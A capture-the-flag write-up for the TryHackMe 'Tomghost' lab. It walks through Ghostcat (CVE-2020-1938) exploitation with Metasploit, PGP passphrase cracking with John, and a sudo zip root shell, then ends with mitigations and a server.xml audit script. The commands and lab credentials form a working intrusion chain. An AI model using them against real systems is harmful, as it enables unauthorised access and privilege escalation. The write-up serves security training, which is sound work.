
Tomghost

Exploit Ghostcat vulnerability (CVE-2020-1938) on Apache Tomcat, decrypt PGP credentials, and escalate privileges via sudo zip misconfiguration.


Tomghost - TryHackMe Writeup

Tomghost is an intermediate CTF machine that demonstrates the exploitation of the Ghostcat vulnerability in Apache Tomcat, followed by PGP credential decryption and sudo privilege escalation.

Difficulty: Medium ⭐⭐
Operating System: Linux (Ubuntu 16.04)
Themes: AJP Protocol Exploitation, PGP Decryption, Sudo Misconfiguration


Objectives

  1. Identify and exploit the Ghostcat vulnerability (CVE-2020-1938)
  2. Extract and decrypt PGP-protected credentials
  3. Gain SSH access and perform lateral movement
  4. Escalate privileges through sudo zip misconfiguration
  5. Capture user and root flags

Reconnaissance

Nmap Scan

Comprehensive port scanning to identify attack surfaces:

nmap -sCV -p- -T4 -oA nmap_tomghost 10.10.182.213

Results:

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
8080/tcp open  http       Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Key Findings:

  • Port 22: SSH service (potential for credential reuse)
  • Port 8009: AJP/1.3 connector reachable from the network (vulnerable to Ghostcat; AJP should only ever be reachable by a local reverse proxy)
  • Port 8080: Apache Tomcat 9.0.30 (one release before the 9.0.31 Ghostcat fix)

Initial Exploitation

Ghostcat Vulnerability (CVE-2020-1938)

Ghostcat is a flaw in the AJP connector that Tomcat (before 9.0.31) enables on port 8009 by default. AJP is designed to sit behind a trusted reverse proxy such as Apache httpd, so Tomcat honours request attributes it receives over it. An attacker who can reach the port directly sets the javax.servlet.include.* attributes in an AJP forward request, and the DefaultServlet serves any file inside the web application's directory, including WEB-INF/web.xml, which Tomcat refuses to serve over plain HTTP. The read is confined to the webapp directory, not the whole filesystem; if the application also accepts file uploads, the same trick can include an uploaded JSP and turn the read into code execution.

Metasploit Exploitation:

msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 > set RHOSTS 10.10.182.213
msf6 > set RPORT 8009
msf6 > set FILENAME /WEB-INF/web.xml
msf6 > run

Extracted Credentials: From the /WEB-INF/web.xml file:

skyfuck:8730281lkjlkjdqlksalks

SSH Access Gained

ssh skyfuck@10.10.182.213
Password: 8730281lkjlkjdqlksalks

Initial Access: User skyfuck


Lateral Movement

User Flag Discovery

user.txt in /home/merlin is readable by skyfuck, so the user flag can be collected before any lateral movement:

skyfuck@ubuntu:/home/merlin$ cat user.txt
THM{GhostCat_1s_so_cr4sy}

PGP File Discovery

Found in skyfuck’s home directory:

ls /home/skyfuck/
credential.pgp  tryhackme.asc

File Analysis:

  • tryhackme.asc: PGP private key file
  • credential.pgp: Encrypted credential file

File Transfer to Attacker Machine

Serve the two files from the target (run in /home/skyfuck). This exposes the directory to anyone who can reach port 8000 on the box, so on a real engagement prefer scp over the SSH session that is already open:

python3 -m http.server 8000

Download on attacker machine:

wget http://10.10.182.213:8000/credential.pgp
wget http://10.10.182.213:8000/tryhackme.asc

PGP Private Key Cracking

The private key in tryhackme.asc is protected by a passphrase; gpg2john turns the key into a hash John can attack, and a wordlist run recovers it:

  1. Convert to John format:

    gpg2john tryhackme.asc > hash.txt

  2. Crack with JohnTheRipper:

    john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Passphrase Found: alexandru

Credential Decryption

  1. Import private key:

    gpg --import tryhackme.asc

  2. Decrypt credential file (gpg prompts for the key passphrase recovered above, alexandru):

    gpg --decrypt credential.pgp
    

Decrypted Credentials:

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j#

User Switching

skyfuck@ubuntu:~$ su merlin
Password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j#
merlin@ubuntu:~$

Privilege Escalation

Sudo Privilege Enumeration

sudo -l

Critical Finding:

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

Zip Sudo Exploitation

Using the technique from GTFOBins. zip -T tests the freshly written archive, and -TT replaces the default test command (unzip -tqq) with one of the attacker's choosing; zip appends the archive name as the last argument, which the trailing # turns into a comment. Because sudo runs zip as root, so is the sh it spawns. Remove the root-owned $TF afterwards (GTFOBins ends the sequence with sudo rm $TF).

# Generate a temporary archive name (mktemp -u prints a name without creating the file)
TF=$(mktemp -u)

# Root shell via zip's test command
sudo zip $TF /etc/hosts -T -TT 'sh #'

Root Shell Obtained:

# whoami
root

Root Flag Capture

cat /root/root.txt
THM{Z1P_1S_FAKE}

Key Takeaways

Attack Path Summary:

Port Scanning → Ghostcat Vulnerability Discovery → 
AJP Protocol Exploitation → Credential Extraction → 
SSH Access → PGP File Discovery → Private Key Cracking → 
Credential Decryption → Lateral Movement → 
Sudo Privilege Enumeration → Zip Exploitation → Root Access

Vulnerabilities Exploited:

  1. CVE-2020-1938 (Ghostcat) - Read of any file inside the webapp, including WEB-INF/web.xml, through the exposed AJP connector
  2. Weak Password Storage - Plaintext credentials in web.xml, the first file every Ghostcat read targets
  3. PGP Passphrase Weakness - Private-key passphrase present in rockyou.txt
  4. Sudo Misconfiguration - NOPASSWD root access to zip, whose -TT option runs an arbitrary test command

Mitigation Strategies:

  1. For Apache Tomcat Security:
    • Upgrade to Tomcat 9.0.31, 8.5.51, 7.0.100 or later, where the AJP connector is disabled by default and, when enabled, binds to loopback and requires a shared secret
    • Disable the AJP connector in server.xml if no reverse proxy uses it; otherwise bind it to 127.0.0.1 and set secretRequired="true" with a secret
    • Implement network segmentation so port 8009 is reachable only from the proxy host
    • Regular security patching
  2. For Credential Security:
    • Secure storage of sensitive data
    • Strong PGP passphrases
    • Avoid storing credentials in configuration files
    • Regular credential rotation
  3. For Linux Security:
    • Principle of least privilege for sudo access
    • Regular audit of sudo permissions
    • Restrict dangerous binaries in sudoers
    • Implement SELinux/AppArmor
  4. For PGP Security:
    • Use strong passphrases (20+ characters)
    • Regular key rotation
    • Secure key storage
    • Implement key escrow procedures
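
To make the Tomcat items concrete, this added script (not from the writeup) checks a server.xml for the conditions Ghostcat needs and contrasts a Tomghost-style connector with a hardened one. Both server.xml fragments are constructed for the example; the attribute names are Tomcat's own, and the ${ajp.secret} placeholder assumes the secret is supplied through catalina.properties or a -D system property rather than committed in the file.

```python
"""Audit a Tomcat server.xml for the AJP exposure Ghostcat relies on.
Added example, not from the writeup. Both server.xml fragments are constructed here;
the attribute names (address, secretRequired, secret) are Tomcat's own, the latter
two existing since 9.0.31 / 8.5.51 / 7.0.100."""
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Tomghost-style configuration: AJP on, every interface, no shared secret
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

# Corrected: AJP kept only for a co-located reverse proxy, loopback-bound, secret required
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="${ajp.secret}" redirectPort="8443"/>
  </Service>
</Server>"""

def audit_ajp_connectors(server_xml):
    """One finding per misconfigured AJP connector attribute; [] means nothing to fix."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if "AJP" not in conn.get("protocol", "HTTP/1.1").upper():   # AJP/1.3 or ...ajp.AjpNioProtocol
            continue
        port, addr = conn.get("port", "?"), conn.get("address")
        if addr is None:
            findings.append(f"AJP port {port}: no address, listens on all interfaces before 9.0.31")
        elif addr not in LOOPBACK:
            findings.append(f"AJP port {port}: bound to {addr}, reachable beyond the proxy host")
        if conn.get("secretRequired", "true").lower() == "false":
            findings.append(f"AJP port {port}: secretRequired=\"false\" lets any client speak AJP")
        elif not conn.get("secret"):
            findings.append(f"AJP port {port}: no secret (accepted before 9.0.31, refuses to start on 9.0.31+)")
    return findings

if __name__ == "__main__":
    for label, xml in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(xml) or "no AJP findings")
```

A connector that is commented out in server.xml is invisible to the parser and produces no finding, which is the intended outcome: if nothing proxies to Tomcat over AJP, removing the connector is the simplest fix.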

Tools Used:

  • Nmap - Port scanning and service enumeration
  • Metasploit - Ghostcat vulnerability exploitation
  • JohnTheRipper - PGP passphrase cracking
  • GPG - PGP file decryption
  • GTFOBins - Privilege escalation reference

Timeline of Events:

  1. Initial Reconnaissance - Port scanning and service identification
  2. Vulnerability Exploitation - Ghostcat attack on AJP port
  3. Credential Discovery - Extraction from web.xml
  4. Initial Access - SSH login as skyfuck
  5. Lateral Movement - PGP decryption and user switching
  6. Privilege Escalation - Sudo zip exploitation
  7. Flag Capture - User and root flags obtained

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb


This post is licensed under CC BY 4.0 by the author.